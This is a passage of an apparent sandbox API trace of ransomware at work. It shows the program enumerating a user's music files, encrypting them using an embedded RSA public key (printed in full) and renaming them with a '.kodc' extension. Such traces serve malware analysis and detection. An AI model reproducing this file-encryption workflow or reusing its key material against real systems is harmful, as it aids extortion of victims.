hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331adc0 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ada8 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad78 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad60 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9dbe8 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.129] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0xb6c4, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xb6c4, lpOverlapped=0x0) returned 1 [0099.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0099.129] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb6c9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.129] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0099.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0099.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0099.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.130] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.130] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.130] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.130] CloseHandle (hObject=0x5cc) returned 1 [0099.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0099.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0099.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0099.131] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wNcyJIAdvLtk.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wncyjiadvltk.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wNcyJIAdvLtk.wav.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wncyjiadvltk.wav.kodc")) returned 1 [0099.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.132] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.133] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a5d60, ftCreationTime.dwHighDateTime=0x1d5b7d1, ftLastAccessTime.dwLowDateTime=0x28ad08d0, ftLastAccessTime.dwHighDateTime=0x1d5b682, ftLastWriteTime.dwLowDateTime=0x28ad08d0, ftLastWriteTime.dwHighDateTime=0x1d5b682, nFileSizeHigh=0x0, nFileSizeLow=0x13291, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X_R1U00TmV8k4bEDrEW.mp3", cAlternateFileName="X_R1U0~1.MP3")) returned 1 [0099.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.133] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\X_R1U00TmV8k4bEDrEW.mp3") returned=".mp3" [0099.134] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\X_R1U00TmV8k4bEDrEW.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\x_r1u00tmv8k4bedrew.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.134] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=78481) returned 1 [0099.134] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.137] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1326b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.137] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.138] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.138] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x13291, lpOverlapped=0x0) returned 1 [0099.138] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.139] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.139] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.139] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0099.139] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.139] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.139] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.140] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.140] GetLastError () returned 0x0 [0099.140] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.140] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0099.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.140] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.140] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.140] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x13290) returned 0x9ba4d90 [0099.140] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9dbe8 [0099.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad60 [0099.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9dc30 [0099.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad78 [0099.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ada8 [0099.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331adc0 [0099.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.141] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ada8 | out: hHeap=0x630000) returned 1 [0099.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331adc0 | out: hHeap=0x630000) returned 1 [0099.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0099.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331adc0 [0099.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ada8 [0099.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0099.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0099.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0099.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331adc0 | out: hHeap=0x630000) returned 1 [0099.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ada8 | out: hHeap=0x630000) returned 1 [0099.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.142] GetCurrentThreadId () returned 0x42c [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b90318 [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.142] GetCurrentThreadId () returned 0x42c [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ada8 [0099.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0099.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331adc0 [0099.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad90 [0099.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331add8 [0099.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a520 [0099.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0099.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ada8 | out: hHeap=0x630000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ada8 [0099.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0099.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 